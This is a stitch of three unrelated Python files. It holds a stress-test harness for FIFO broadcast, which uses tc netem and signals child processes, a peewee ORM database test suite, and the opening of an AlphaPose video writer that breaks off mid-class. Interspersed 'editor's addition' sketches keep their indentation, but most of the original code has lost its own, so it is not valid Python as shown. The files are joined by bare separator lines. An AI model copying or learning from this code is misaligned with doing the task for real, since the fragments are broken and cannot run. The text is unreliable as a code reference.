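# --- Illustrative sketch (editor's addition) ----------------------------------
# TC above shells out to `tc qdisc ... netem` to emulate delay, loss and
# reordering on an interface. The hypothetical helper below only builds the two
# command strings for a given losses dict, which makes it easy to inspect what
# would be executed without touching the network:
def build_netem_commands(losses, interface="lo"):
    add_qdisc = 'tc qdisc add dev {} root netem 2>/dev/null'.format(interface)
    change_qdisc = ('tc qdisc change dev {} root netem delay {} {} '
                    'distribution normal loss {} {} reorder {} {}').format(
        interface, *losses['delay'], *losses['loss'], *losses['reordering'])
    return [add_qdisc, change_qdisc]
# e.g. build_netem_commands({'delay': ('200ms', '50ms'), 'loss': ('10%', '25%'),
#                            'reordering': ('25%', '50%')})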
class ProcessState(Enum):
RUNNING = 1
STOPPED = 2
TERMINATED = 3
class ProcessInfo:
def __init__(self, handle):
self.lock = threading.Lock()
self.handle = handle
self.state = ProcessState.RUNNING
@staticmethod
def stateToSignal(state):
if state == ProcessState.RUNNING:
return signal.SIGCONT
if state == ProcessState.STOPPED:
return signal.SIGSTOP
if state == ProcessState.TERMINATED:
return signal.SIGTERM
@staticmethod
def stateToSignalStr(state):
if state == ProcessState.RUNNING:
return "SIGCONT"
if state == ProcessState.STOPPED:
return "SIGSTOP"
if state == ProcessState.TERMINATED:
return "SIGTERM"
@staticmethod
def validStateTransition(current, desired):
if current == ProcessState.TERMINATED:
return False
if current == ProcessState.RUNNING:
return desired == ProcessState.STOPPED or desired == ProcessState.TERMINATED
if current == ProcessState.STOPPED:
return desired == ProcessState.RUNNING
return False
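# --- Illustrative sketch (editor's addition) ----------------------------------
# validStateTransition above encodes a small process lifecycle: RUNNING may be
# stopped or terminated, STOPPED may only be resumed, TERMINATED is final. The
# same rules expressed as an explicit transition table (hypothetical alternative,
# not used by ProcessInfo):
_ALLOWED_TRANSITIONS = {
    ProcessState.RUNNING: {ProcessState.STOPPED, ProcessState.TERMINATED},
    ProcessState.STOPPED: {ProcessState.RUNNING},
    ProcessState.TERMINATED: set(),
}
def valid_transition(current, desired):
    return desired in _ALLOWED_TRANSITIONS[current]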
class AtomicSaturatedCounter:
def __init__(self, saturation, initial=0):
self._saturation = saturation
self._value = initial
self._lock = threading.Lock()
def reserve(self):
with self._lock:
if self._value < self._saturation:
self._value += 1
return True
else:
return False
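# --- Illustrative sketch (editor's addition) ----------------------------------
# AtomicSaturatedCounter.reserve() grants at most `saturation` successful
# reservations, even under concurrent callers; StressTest uses it to cap how
# many processes may be terminated. A tiny single-threaded demonstration of
# that contract (hypothetical helper):
def _demo_saturated_counter():
    counter = AtomicSaturatedCounter(saturation=2)
    results = [counter.reserve() for _ in range(4)]
    assert results == [True, True, False, False]
    return results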
class Validation:
def __init__(self, processes, messages, outputDir):
self.processes = processes
self.messages = messages
self.outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(self.outputDirPath):
raise Exception(
"`{}` is not a directory".format(self.outputDirPath))
def generateConfig(self):
# Implement on the derived classes
pass
def checkProcess(self, pid):
# Implement on the derived classes
pass
def checkAll(self, continueOnError=True):
ok = True
for pid in range(1, self.processes+1):
ret = self.checkProcess(pid)
if not ret:
ok = False
if not ret and not continueOnError:
return False
return ok
class FifoBroadcastValidation(Validation):
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode='w')
config = tempfile.NamedTemporaryFile(mode='w')
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
hosts.flush()
config.write("{}\n".format(self.messages))
config.flush()
return (hosts, config)
def checkProcess(self, pid):
filePath = os.path.join(
self.outputDirPath, 'proc{:02d}.output'.format(pid))
i = 1
nextMessage = defaultdict(lambda: 1)
filename = os.path.basename(filePath)
with open(filePath) as f:
for lineNumber, line in enumerate(f):
tokens = line.split()
# Check broadcast
if tokens[0] == 'b':
msg = int(tokens[1])
if msg != i:
print("File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
filename, lineNumber, i, msg))
return False
i += 1
# Check delivery
if tokens[0] == 'd':
sender = int(tokens[1])
msg = int(tokens[2])
if msg != nextMessage[sender]:
print("File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
filename, lineNumber, nextMessage[sender], msg))
return False
else:
nextMessage[sender] = msg + 1
return True
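# --- Illustrative sketch (editor's addition) ----------------------------------
# checkProcess above enforces two FIFO properties on a process' output file:
# broadcasts ("b <seq>") must be numbered 1, 2, 3, ... and deliveries
# ("d <sender> <seq>") must arrive in per-sender order. The same check on an
# in-memory list of lines (check_fifo_lines is a hypothetical helper, not used
# by the validation):
def check_fifo_lines(lines):
    next_broadcast = 1
    next_delivery = defaultdict(lambda: 1)
    for line in lines:
        tokens = line.split()
        if tokens[0] == 'b':
            if int(tokens[1]) != next_broadcast:
                return False
            next_broadcast += 1
        elif tokens[0] == 'd':
            sender, msg = int(tokens[1]), int(tokens[2])
            if msg != next_delivery[sender]:
                return False
            next_delivery[sender] = msg + 1
    return True
# check_fifo_lines(["b 1", "b 2", "d 3 1", "d 3 2"]) -> True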
class LCausalBroadcastValidation(Validation):
    def __init__(self, processes, messages, outputDir, causalRelationships):
        super().__init__(processes, messages, outputDir)
def generateConfig(self):
raise NotImplementedError()
def checkProcess(self, pid):
raise NotImplementedError()
class StressTest:
def __init__(self, procs, concurrency, attempts, attemptsRatio):
self.processes = len(procs)
self.processesInfo = dict()
for (logicalPID, handle) in procs:
self.processesInfo[logicalPID] = ProcessInfo(handle)
self.concurrency = concurrency
self.attempts = attempts
self.attemptsRatio = attemptsRatio
maxTerminatedProcesses = self.processes // 2 if self.processes % 2 == 1 else (
self.processes - 1) // 2
self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)
def stress(self):
selectProc = list(range(1, self.processes+1))
random.shuffle(selectProc)
selectOp = [ProcessState.STOPPED] * int(1000 * self.attemptsRatio['STOP']) + \
[ProcessState.RUNNING] * int(1000 * self.attemptsRatio['CONT']) + \
[ProcessState.TERMINATED] * \
int(1000 * self.attemptsRatio['TERM'])
random.shuffle(selectOp)
successfulAttempts = 0
while successfulAttempts < self.attempts:
proc = random.choice(selectProc)
op = random.choice(selectOp)
info = self.processesInfo[proc]
with info.lock:
if ProcessInfo.validStateTransition(info.state, op):
if op == ProcessState.TERMINATED:
reserved = self.terminatedProcs.reserve()
if reserved:
selectProc.remove(proc)
else:
continue
time.sleep(float(random.randint(50, 500)) / 1000.0)
info.handle.send_signal(ProcessInfo.stateToSignal(op))
info.state = op
successfulAttempts += 1
print("Sending {} to process {}".format(
ProcessInfo.stateToSignalStr(op), proc))
# if op == ProcessState.TERMINATED and proc not in terminatedProcs:
# if len(terminatedProcs) < maxTerminatedProcesses:
# terminatedProcs.add(proc)
# if len(terminatedProcs) == maxTerminatedProcesses:
# break
def remainingUnterminatedProcesses(self):
remaining = []
for pid, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
remaining.append(pid)
return None if len(remaining) == 0 else remaining
def terminateAllProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING))
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.TERMINATED))
return False
def continueStoppedProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING))
def run(self):
if self.concurrency > 1:
threads = [threading.Thread(target=self.stress)
for _ in range(self.concurrency)]
[p.start() for p in threads]
[p.join() for p in threads]
else:
self.stress()
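# --- Illustrative sketch (editor's addition) ----------------------------------
# StressTest.stress() builds a 1000-entry list whose composition mirrors the
# attemptsDistribution ratios and then samples it uniformly. The hypothetical
# helper below shows an equivalent weighted choice using random.choices from
# the standard library (an alternative, not what the class above does):
def sample_operation(attempts_ratio):
    ops = [ProcessState.STOPPED, ProcessState.RUNNING, ProcessState.TERMINATED]
    weights = [attempts_ratio['STOP'], attempts_ratio['CONT'], attempts_ratio['TERM']]
    return random.choices(ops, weights=weights, k=1)[0]
# sample_operation({'STOP': 0.5, 'CONT': 0.5, 'TERM': 0.0}) never yields TERMINATED.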
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
runscriptPath = os.path.abspath(runscript)
if not os.path.isfile(runscriptPath):
raise Exception("`{}` is not a file".format(runscriptPath))
if os.path.basename(runscriptPath) != 'run.sh':
raise Exception("`{}` is not a runscript".format(runscriptPath))
outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(outputDirPath):
raise Exception("`{}` is not a directory".format(outputDirPath))
baseDir, _ = os.path.split(runscriptPath)
bin_cpp = os.path.join(baseDir, "bin", "da_proc")
bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
if os.path.exists(bin_cpp):
cmd = [bin_cpp]
elif os.path.exists(bin_java):
cmd = ['java', '-jar', bin_java]
else:
raise Exception(
"`{}` could not find a binary to execute. Make sure you build before validating".format(runscriptPath))
procs = []
for pid in range(1, processes+1):
cmd_ext = ['--id', str(pid),
'--hosts', hostsFilePath,
'--barrier', '{}:{}'.format(BARRIER_IP, BARRIER_PORT),
'--signal', '{}:{}'.format(SIGNAL_IP, SIGNAL_PORT),
'--output', os.path.join(outputDirPath,
'proc{:02d}.output'.format(pid)),
configFilePath]
stdoutFd = open(os.path.join(
outputDirPath, 'proc{:02d}.stdout'.format(pid)), "w")
stderrFd = open(os.path.join(
outputDirPath, 'proc{:02d}.stderr'.format(pid)), "w")
procs.append((pid, subprocess.Popen(
cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd)))
return procs
def main(processes, messages, runscript, broadcastType, logsDir, testConfig):
# Set tc for loopback
tc = TC(testConfig['TC'])
print(tc)
# Start the barrier
initBarrier = barrier.Barrier(BARRIER_IP, BARRIER_PORT, processes)
initBarrier.listen()
startTimesFuture = initBarrier.startTimesFuture()
initBarrierThread = threading.Thread(target=initBarrier.wait)
initBarrierThread.start()
# Start the finish signal
finishSignal = finishedSignal.FinishedSignal(
SIGNAL_IP, SIGNAL_PORT, processes)
finishSignal.listen()
finishSignalThread = threading.Thread(target=finishSignal.wait)
finishSignalThread.start()
if broadcastType == "fifo":
validation = FifoBroadcastValidation(processes, messages, logsDir)
else:
validation = LCausalBroadcastValidation(
processes, messages, logsDir, None)
hostsFile, configFile = validation.generateConfig()
    procs = None
    try:
# Start the processes and get their PIDs
procs = startProcesses(processes, runscript,
hostsFile.name, configFile.name, logsDir)
# Create the stress test
st = StressTest(procs,
testConfig['ST']['concurrency'],
testConfig['ST']['attempts'],
testConfig['ST']['attemptsDistribution'])
for (logicalPID, procHandle) in procs:
print("Process with logicalPID {} has PID {}".format(
logicalPID, procHandle.pid))
initBarrierThread.join()
print("All processes have been initialized.")
st.run()
print("StressTest is complete.")
print("Resuming stopped processes.")
st.continueStoppedProcesses()
print("Waiting until all running processes have finished broadcasting.")
finishSignalThread.join()
for pid, startTs in OrderedDict(sorted(startTimesFuture.items())).items():
print("Process {} finished broadcasting {} messages in {} ms".format(
pid, messages, finishSignal.endTimestamps()[pid] - startTs))
unterminated = st.remainingUnterminatedProcesses()
if unterminated is not None:
input('Hit `Enter` to terminate the remaining processes with logicalPIDs {}.'.format(
unterminated))
st.terminateAllProcesses()
mutex = threading.Lock()
def waitForProcess(logicalPID, procHandle, mutex):
procHandle.wait()
with mutex:
print("Process {} exited with {}".format(
logicalPID, procHandle.returncode))
# Monitor which processes have exited
monitors = [threading.Thread(target=waitForProcess, args=(
logicalPID, procHandle, mutex)) for (logicalPID, procHandle) in procs]
[p.start() for p in monitors]
[p.join() for p in monitors]
input('Hit `Enter` to validate the output')
print("Result of validation: {}".format(validation.checkAll()))
finally:
if procs is not None:
for _, p in procs:
p.kill()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-r",
"--runscript",
required=True,
dest="runscript",
help="Path to run.sh",
)
parser.add_argument(
"-b",
"--broadcast",
choices=["fifo", "lcausal"],
required=True,
dest="broadcastType",
help="Which broadcast implementation to test",
)
parser.add_argument(
"-l",
"--logs",
required=True,
dest="logsDir",
help="Directory to store stdout, stderr and outputs generated by the processes",
)
parser.add_argument(
"-p",
"--processes",
required=True,
type=int,
dest="processes",
help="Number of processes that broadcast",
)
parser.add_argument(
"-m",
"--messages",
required=True,
type=int,
dest="messages",
help="Maximum number (because it can crash) of messages that each process can broadcast",
)
results = parser.parse_args()
testConfig = {
# Network configuration using the tc command
'TC': {
'delay': ('200ms', '50ms'),
'loss': ('10%', '25%'),
'reordering': ('25%', '50%')
},
# StressTest configuration
'ST': {
            'concurrency': 8, # How many threads are interfering with the running processes
            'attempts': 8, # How many interfering attempts each thread makes
            'attemptsDistribution': { # Probability with which an interfering thread will
                                      # select an interfering action (make sure they add up to 1)
'STOP': 0.5,
'CONT': 0.5,
'TERM': 0.0
}
}
}
main(results.processes, results.messages, results.runscript,
results.broadcastType, results.logsDir, testConfig)
|
database.py
|
from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import requires_postgresql
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
database = db_loader('sqlite3')
def test_pragmas(self):
self.database.cache_size = -2048
self.assertEqual(self.database.cache_size, -2048)
self.database.cache_size = -4096
self.assertEqual(self.database.cache_size, -4096)
self.database.foreign_keys = 'on'
self.assertEqual(self.database.foreign_keys, 1)
self.database.foreign_keys = 'off'
self.assertEqual(self.database.foreign_keys, 0)
def test_timeout_semantics(self):
self.assertEqual(self.database.timeout, 5)
self.assertEqual(self.database.pragma('busy_timeout'), 5000)
self.database.timeout = 2.5
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
self.database.close()
self.database.connect()
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
def test_pragmas_deferred(self):
pragmas = (('journal_mode', 'wal'),)
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
# Test pragmas preserved after initializing.
db.init(':memory:')
self.assertEqual(db._pragmas, pragmas)
db = SqliteDatabase(None)
self.assertEqual(db._pragmas, ())
# Test pragmas are set and subsequently overwritten.
db.init(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
db.init(':memory:', pragmas=())
self.assertEqual(db._pragmas, ())
# Test when specified twice, the previous value is overwritten.
db = SqliteDatabase(None, pragmas=pragmas)
db.init(':memory:', pragmas=(('cache_size', -8000),))
self.assertEqual(db._pragmas, (('cache_size', -8000),))
def test_pragmas_as_dict(self):
pragmas = {'journal_mode': 'wal'}
pragma_list = [('journal_mode', 'wal')]
db = SqliteDatabase(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
# Test deferred databases correctly handle pragma dicts.
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:')
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:', pragmas={})
self.assertEqual(db._pragmas, [])
def test_pragmas_permanent(self):
db = SqliteDatabase(':memory:')
db.execute_sql('pragma foreign_keys=0')
self.assertEqual(db.foreign_keys, 0)
db.pragma('foreign_keys', 1, True)
self.assertEqual(db.foreign_keys, 1)
db.close()
db.connect()
self.assertEqual(db.foreign_keys, 1)
def test_context_settings(self):
class TestDatabase(Database):
field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
operations = {'LIKE': '~', 'NEW': '->>'}
param = '$'
test_db = TestDatabase(None)
state = test_db.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], FIELD.INT)
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
self.assertEqual(state.operations['LIKE'], '~')
self.assertEqual(state.operations['NEW'], '->>')
self.assertEqual(state.operations['ILIKE'], 'ILIKE')
self.assertEqual(state.param, '$')
self.assertEqual(state.quote, '""')
test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
'INT': 'XXX_INT'})
state = test_db2.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], 'XXX_INT')
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
def test_connection_state(self):
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
self.database.close()
self.assertTrue(self.database.is_closed())
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
def test_connection_initialization(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
self.assertEqual(state['count'], 0)
conn = db.connection()
self.assertEqual(state['count'], 1)
# Since already connected, nothing happens here.
conn = db.connection()
self.assertEqual(state['count'], 1)
def test_connect_semantics(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
db.connect()
self.assertEqual(state['count'], 1)
self.assertRaises(OperationalError, db.connect)
self.assertEqual(state['count'], 1)
self.assertFalse(db.connect(reuse_if_open=True))
self.assertEqual(state['count'], 1)
with db:
self.assertEqual(state['count'], 1)
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
with db:
self.assertEqual(state['count'], 2)
def test_execute_sql(self):
self.database.execute_sql('CREATE TABLE register (val INTEGER);')
self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
(1337, 31337))
cursor = self.database.execute_sql(
'SELECT val FROM register ORDER BY val')
self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
self.database.execute_sql('DROP TABLE register;')
def test_bind_helpers(self):
db = get_in_memory_db()
alt_db = get_in_memory_db()
class Base(Model):
class Meta:
database = db
class A(Base):
a = TextField()
class B(Base):
b = TextField()
db.create_tables([A, B])
# Temporarily bind A to alt_db.
with alt_db.bind_ctx([A]):
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
self.assertTrue(A.table_exists())
self.assertTrue(B.table_exists())
alt_db.bind([A])
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
db.close()
alt_db.close()
def test_batch_commit(self):
class PatchCommitDatabase(SqliteDatabase):
commits = 0
def begin(self): pass
def commit(self):
self.commits += 1
db = PatchCommitDatabase(':memory:')
def assertBatches(n_objs, batch_size, n_commits):
accum = []
source = range(n_objs)
db.commits = 0
for item in db.batch_commit(source, batch_size):
accum.append(item)
self.assertEqual(accum, list(range(n_objs)))
self.assertEqual(db.commits, n_commits)
assertBatches(12, 1, 12)
assertBatches(12, 2, 6)
assertBatches(12, 3, 4)
assertBatches(12, 4, 3)
assertBatches(12, 5, 3)
assertBatches(12, 6, 2)
assertBatches(12, 7, 2)
assertBatches(12, 11, 2)
assertBatches(12, 12, 1)
assertBatches(12, 13, 1)
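# Illustrative sketch (not part of the original suite): batch_commit() wraps an
# iterable so that every `batch_size` items yielded are committed in a single
# transaction. The KV model below is hypothetical and exists only for this demo.
def _example_batch_commit():
    db = SqliteDatabase(':memory:')
    class KV(Model):
        key = TextField()
        class Meta:
            database = db
    db.create_tables([KV])
    # 100 inserts grouped into 4 commits of 25 rows each.
    for i in db.batch_commit(range(100), 25):
        KV.create(key='k%d' % i)
    assert KV.select().count() == 100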
class TestThreadSafety(ModelTestCase):
nthreads = 4
nrows = 10
requires = [User]
def test_multiple_writers(self):
def create_users(idx):
for i in range(idx * self.nrows, (idx + 1) * self.nrows):
User.create(username='u%d' % i)
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=create_users, args=(i,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(User.select().count(), self.nrows * self.nthreads)
def test_multiple_readers(self):
data = Queue()
def read_user_count(n):
for i in range(n):
data.put(User.select().count())
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=read_user_count,
args=(self.nrows,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(data.qsize(), self.nrows * self.nthreads)
class TestDeferredDatabase(BaseTestCase):
def test_deferred_database(self):
deferred_db = SqliteDatabase(None)
self.assertTrue(deferred_db.deferred)
class DeferredModel(Model):
class Meta:
database = deferred_db
self.assertRaises(Exception, deferred_db.connect)
query = DeferredModel.select()
self.assertRaises(Exception, query.execute)
deferred_db.init(':memory:')
self.assertFalse(deferred_db.deferred)
conn = deferred_db.connect()
self.assertFalse(deferred_db.is_closed())
DeferredModel._schema.create_all()
self.assertEqual(list(DeferredModel.select()), [])
deferred_db.init(None)
self.assertTrue(deferred_db.deferred)
# The connection was automatically closed.
self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
description = TextField()
class Meta:
schema = 'huey'
@requires_postgresql
class TestSchemaNamespace(ModelTestCase):
requires = [CatToy]
def setUp(self):
with self.database:
self.execute('CREATE SCHEMA huey;')
super(TestSchemaNamespace, self).setUp()
def tearDown(self):
super(TestSchemaNamespace, self).tearDown()
with self.database:
self.execute('DROP SCHEMA huey;')
def test_schema(self):
toy = CatToy.create(description='fur mouse')
toy_db = CatToy.select().where(CatToy.id == toy.id).get()
self.assertEqual(toy.id, toy_db.id)
self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
database = db_loader('sqlite3')
requires = [User]
def test_sqlite_isolation(self):
for username in ('u1', 'u2', 'u3'): User.create(username=username)
new_db = db_loader('sqlite3')
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 3)
self.assertEqual(User.select().count(), 3)
self.assertEqual(User.delete().execute(), 3)
with self.database.atomic():
User.create(username='u4')
User.create(username='u5')
# Second conn does not see the changes.
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Third conn does not see the changes.
new_db2 = db_loader('sqlite3')
curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Original connection sees its own changes.
self.assertEqual(User.select().count(), 2)
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
name = CharField(unique=True)
class IndexedModel(TestModel):
first = CharField()
last = CharField()
dob = DateField()
class Meta:
indexes = (
(('first', 'last', 'dob'), True),
(('first', 'last'), False),
)
class TestIntrospection(ModelTestCase):
requires = [Category, User, UniqueModel, IndexedModel]
def test_table_exists(self):
self.assertTrue(self.database.table_exists(User._meta.table_name))
self.assertFalse(self.database.table_exists('nuggies'))
def test_get_tables(self):
tables = self.database.get_tables()
required = set(m._meta.table_name for m in self.requires)
self.assertTrue(required.issubset(set(tables)))
UniqueModel._schema.drop_all()
tables = self.database.get_tables()
self.assertFalse(UniqueModel._meta.table_name in tables)
def test_get_indexes(self):
indexes = self.database.get_indexes('unique_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('unique_model_pkey', 'PRIMARY')]
self.assertEqual(data, [
('unique_model_name', ['name'], True, 'unique_model')])
indexes = self.database.get_indexes('indexed_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('indexed_model_pkey', 'PRIMARY')]
self.assertEqual(sorted(data), [
('indexed_model_first_last', ['first', 'last'], False,
'indexed_model'),
('indexed_model_first_last_dob', ['first', 'last', 'dob'], True,
'indexed_model')])
def test_get_columns(self):
columns = self.database.get_columns('indexed_model')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('id', False, True, 'indexed_model'),
('first', False, False, 'indexed_model'),
('last', False, False, 'indexed_model'),
('dob', False, False, 'indexed_model')])
columns = self.database.get_columns('category')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('name', False, True, 'category'),
('parent_id', True, False, 'category')])
def test_get_primary_keys(self):
primary_keys = self.database.get_primary_keys('users')
self.assertEqual(primary_keys, ['id'])
primary_keys = self.database.get_primary_keys('category')
self.assertEqual(primary_keys, ['name'])
@requires_models(User, Tweet, Category)
def test_get_foreign_keys(self):
foreign_keys = self.database.get_foreign_keys('tweet')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('user_id', 'users', 'id', 'tweet')])
foreign_keys = self.database.get_foreign_keys('category')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
def test_sort_models(self):
class A(Model):
pass
class B(Model):
a = ForeignKeyField(A)
class C(Model):
b = ForeignKeyField(B)
class D(Model):
c = ForeignKeyField(C)
class E(Model):
pass
models = [A, B, C, D, E]
for list_of_models in permutations(models):
sorted_models = sort_models(list_of_models)
self.assertEqual(sorted_models, models)
class TestDBProxy(BaseTestCase):
def test_db_proxy(self):
db = Proxy()
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
username = TextField()
class Tweet(BaseModel):
user = ForeignKeyField(User, backref='tweets')
message = TextField()
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
self.assertEqual(User._meta.database.database, ':memory:')
self.assertEqual(Tweet._meta.database.database, ':memory:')
self.assertTrue(User._meta.database.is_closed())
self.assertTrue(Tweet._meta.database.is_closed())
sqlite_db.connect()
self.assertFalse(User._meta.database.is_closed())
self.assertFalse(Tweet._meta.database.is_closed())
sqlite_db.close()
class Data(TestModel):
key = TextField()
value = TextField()
class Meta:
schema = 'main'
class TestAttachDatabase(ModelTestCase):
database = db_loader('sqlite3')
requires = [Data]
def test_attach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
# Clone data into the in-memory cache.
class CacheData(Data):
class Meta:
schema = 'cache'
self.assertFalse(CacheData.table_exists())
CacheData.create_table(safe=False)
self.assertTrue(CacheData.table_exists())
(CacheData
.insert_from(Data.select(), fields=[Data.id, Data.key, Data.value])
.execute())
# Update the source data.
query = Data.update({Data.value: Data.value + '-x'})
self.assertEqual(query.execute(), 2)
# Verify the source data was updated.
query = Data.select(Data.key, Data.value).order_by(Data.key)
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "main"."data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1-x', 'v2-x'])
# Verify the cached data reflects the original data, pre-update.
query = (CacheData
.select(CacheData.key, CacheData.value)
.order_by(CacheData.key))
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "cache"."cache_data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1', 'v2'])
database.close()
        # On re-connecting, the in-memory database will be re-attached.
database.connect()
# Cache-Data table does not exist.
self.assertFalse(CacheData.table_exists())
# Double-check the sqlite master table.
curs = database.execute_sql('select * from cache.sqlite_master;')
self.assertEqual(curs.fetchall(), [])
# Because it's in-memory, the table needs to be re-created.
CacheData.create_table(safe=False)
self.assertEqual(CacheData.select().count(), 0)
# Original data is still there.
self.assertEqual(Data.select().count(), 2)
def test_attach_detach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
curs = database.execute_sql('select * from cache.sqlite_master')
self.assertEqual(curs.fetchall(), [])
self.assertFalse(database.attach(':memory:', 'cache'))
self.assertRaises(OperationalError, database.attach, 'foo.db', 'cache')
self.assertTrue(database.detach('cache'))
self.assertFalse(database.detach('cache'))
self.assertRaises(OperationalError, database.execute_sql,
'select * from cache.sqlite_master')
def test_sqlite_schema_support(self):
class CacheData(Data):
class Meta:
schema = 'cache'
# Attach an in-memory cache database and create the cache table.
self.database.attach(':memory:', 'cache')
CacheData.create_table()
tables = self.database.get_tables()
self.assertEqual(tables, ['data'])
tables = self.database.get_tables(schema='cache')
self.assertEqual(tables, ['cache_data'])
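# Note (illustrative, not from the original suite): attach(path, name) roughly
# corresponds to issuing "ATTACH DATABASE '<path>' AS <name>" on the connection
# and detach(name) to "DETACH DATABASE <name>"; registered attachments are
# re-applied whenever the connection is reopened, which is why the in-memory
# 'cache' schema above comes back (empty) after reconnecting.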
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
from alphapose.face.face import face_process
from alphapose.hand.hand import handDetect
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.final_result = []
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
